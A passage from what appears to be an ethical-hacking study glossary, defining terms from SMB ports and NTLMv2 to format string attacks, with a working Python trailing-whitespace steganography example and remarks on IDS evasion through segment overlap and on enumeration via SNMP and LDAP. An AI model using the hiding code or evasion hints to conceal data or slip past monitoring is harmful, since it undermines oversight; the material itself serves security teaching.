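    print("stream match:", stream_match(out_of_order))
```

Real reassembly also has to decide how to resolve overlapping segments, where different operating systems favour the old or the new data; an IDS that guesses differently from the target can be evaded the same way.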
Static NAT (Network Address Translation)
A type of NAT in which a private IP address is mapped to a public IP address, where the public address is always the same IP address (i.e., it has a static address).
RFC 2827
Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing (also published as BCP 38). It asks network operators to drop packets whose source address does not belong to the network they arrive from, which removes the spoofed traffic used in many DoS attacks.
SMB (Server Message Block)
The Server Message Block (SMB) protocol is a network file sharing protocol that allows applications on a computer to read and write files and to request services from server programs over a network. SMB runs directly over TCP on port 445, or over NetBIOS on TCP port 139 (NetBIOS name and datagram services use UDP 137 and 138). Port 135 is the Microsoft RPC endpoint mapper, which is commonly scanned alongside SMB but is a different service.
Cygwin
Is a Unix-like environment and command-line interface for Microsoft Windows. Cygwin provides native integration of Windows-based applications, data, and other system resources with applications, software tools, and data of the Unix-like environment.
Zero-day vulnerability
A zero day vulnerability refers to a hole in software that is unknown to the vendor. This security hole is then exploited by hackers before the vendor becomes aware and hurries to fix it—this exploit is called a zero day attack.
CACLS.exe
Displays or modifies Access Control Lists (ACLs) on files and folders from the command line (superseded by icacls.exe on current Windows versions).
Snow Steganography
Is used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.
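A whitespace steganography scheme in the spirit of the description above, added as an example that is not from the study guide and not the snow program's own file format. Each message byte is appended to one cover line as eight trailing characters, a space for a 0 bit and a tab for a 1 bit; the cover text and message are constructed.

```python
"""Trailing-whitespace steganography (added example; simplified scheme).

Not the snow tool's actual encoding: snow packs bits more densely and adds
optional compression and encryption.  This version shows the core idea with
one byte per line.
"""
from typing import List


def hide(cover_lines: List[str], message: str) -> List[str]:
    """Append one message byte, as 8 trailing space/tab characters, to each line."""
    payload = message.encode("utf-8")
    out = [line.rstrip(" \t") for line in cover_lines]   # normalise existing trailing whitespace
    while len(out) < len(payload):                       # not enough cover lines: add blank ones
        out.append("")
    for i, byte in enumerate(payload):
        bits = f"{byte:08b}"
        out[i] += "".join("\t" if b == "1" else " " for b in bits)
    return out


def reveal(lines: List[str]) -> str:
    """Read back every line that ends in exactly 8 space/tab characters."""
    data = bytearray()
    for line in lines:
        trailing = line[len(line.rstrip(" \t")):]
        if len(trailing) == 8:
            data.append(int("".join("1" if c == "\t" else "0" for c in trailing), 2))
    return data.decode("utf-8")


COVER = [                                   # constructed cover text
    "The quick brown fox",
    "jumps over",
    "the lazy dog.",
]

if __name__ == "__main__":
    stego = hide(COVER, "hi")
    print(repr(stego))
    print("recovered:", reveal(stego))
```

The weakness is the same as for the real tool: a checker that counts trailing whitespace (or an editor that strips it on save) destroys or exposes the channel, so the hidden text should also be encrypted, as the description notes.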
Microsoft Baseline Security Analyzer (MBSA)
Is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows and Windows components.
NTLMv2
NTLMv2 was developed in response to attacks against the LM and NTLMv1 authentication protocols. The LM protocol, as the name implies, originated in the LAN Manager network operating system in the mid-1980s. The NT hash itself is the MD4 digest of the UTF-16LE password (unsalted); NTLMv2 computes its challenge response with HMAC-MD5 over the server challenge and client-supplied data that includes a timestamp, which defeats precomputed tables and simple replay of a captured response.
HTTP Tunneling
Is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a channel that the network protocol being tunneled uses to communicate.
Network Time Protocol (NTP)
Is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks. It uses UDP port 123. Accurate time matters for security because log correlation, Kerberos tickets and certificate validity checks all depend on it.
Message Repudiation and Non-repudiation
Repudiation means that a party can deny having sent a message or that a communication took place. Non-repudiation means that the party cannot credibly deny it: a digital signature made with a private key that only the sender holds lets the recipient, or a third party, prove who sent the message.
TOR Proxy
Tor directs Internet traffic through a free, worldwide, volunteer network consisting of more than six thousand relays to conceal a user's location and usage from anyone conducting network surveillance or traffic analysis.
Tripwire
Is a security and data integrity tool useful for monitoring and alerting on specific file change(s) on a range of systems.
Sigverif.exe
Microsoft's digital file signature integrity verification.
Poison Ivy
Is a RAT (Remote Access Trojan) whose operators control infected Windows hosts from a command-and-control console, with features such as keylogging, file transfer and screen capture.
Single sign-on (SSO)
Is a property of access control of multiple related, but independent software systems. With this property a user logs in once and gains access to all systems without being prompted to log in again at each of them.
LDAP
The Lightweight Directory Access Protocol (LDAP) is a directory service protocol that runs on top of the TCP/IP stack. It provides a mechanism to connect to, search and modify Internet directories and is based on a client-server model. It uses TCP port 389 (636 for LDAP over TLS/SSL). Where anonymous binds are allowed, LDAP can be queried to enumerate users, groups and the directory structure.
Exploit
Is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).
Lynx
Text-based browser that supports both HTTP/HTTPS and FTP. It's a basic browser.
SNMP (Simple Network Management Protocol)
Is an "Internet-standard protocol for managing devices on IP networks". Devices that typically support SNMP include routers, switches, servers, workstations, printers, modem racks and more. Agents listen on UDP port 161 and send traps to UDP port 162. SNMPv1 and v2c authenticate only with community strings (defaults such as public and private) sent in clear text, which makes them a common enumeration target; SNMPv3 adds authentication and encryption.
PSK (Phase-shift Keying):
Is a digital modulation scheme that conveys data by changing, or modulating, the phase of a reference signal (the carrier wave); variants of it are used by Bluetooth. Not to be confused with PSK meaning pre-shared key, as in WPA/WPA2-Personal.
Stealth Anonymizer
Stealth Anonymizer works in conjunction with proxy servers to provide the most private platform possible for you to browse the internet.
EAP (Extensible Authentication Protocol)
Is a general authentication framework that supports multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates, public-key authentication and smart cards. IEEE 802.1X specifies how EAP is encapsulated in LAN frames (EAPOL) for port-based network access control.
Graphical Identification and Authentication (GINA)
Is a component of Windows 2000, Windows XP and Windows Server 2003 that provides secure authentication and interactive logon services. Because a replacement GINA DLL can be registered, it was a classic place for attackers to hook to capture credentials at logon.
IP Tables
Is a user-space application program that allows a system administrator to configure the tables provided by the Linux kernel firewall (implemented as different Netfilter modules) and the chains and rules it stores.
Webgoat
Is a deliberately insecure web application maintained by OWASP that teaches web application security through hands-on lessons (SQL injection, cross-site scripting, access control flaws and more). It is meant to be run in an isolated lab environment and never exposed to the Internet.
Format String Attack
Occurs when user-supplied input is passed to a function as its format string (for example printf(input) instead of printf("%s", input)). Format directives in the input are then interpreted: %x and %s read values off the stack, and %n writes to memory, so an attacker can leak data, crash the program with a segmentation fault, or execute code, compromising the security or stability of the system.